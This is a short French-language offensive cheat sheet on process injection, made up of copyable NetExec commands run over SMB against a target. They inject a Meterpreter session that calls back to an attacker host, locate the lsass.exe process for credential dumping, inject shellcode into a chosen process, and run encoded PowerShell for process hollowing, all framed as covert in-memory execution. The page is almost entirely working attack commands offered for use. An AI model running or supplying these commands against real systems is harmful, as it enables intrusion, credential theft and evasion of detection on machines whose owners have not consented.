Exploitation

Process Injection

Injection de shellcode et hollowing de processus pour exécution furtive en mémoire.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M met_inject -o LHOST=$ATTACKER_IP LPORT=$PORT

Description: Injection Meterpreter via NXC : injecte dans un processus existant sans créer de nouveau processus.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'tasklist /fi "imagename eq lsass.exe"'

Description: Identifier le PID de lsass.exe avant injection : cible privilégiée pour dump de credentials.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M shellcode_inject -o SHELLCODE_FILE=payload.bin PID=$PID

Description: Injecter un shellcode dans un PID cible via le module shellcode_inject de NXC.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'powershell -enc $BASE64_HOLLOWING'

Description: Process hollowing encodé via PowerShell : remplace le code d'un processus légitime.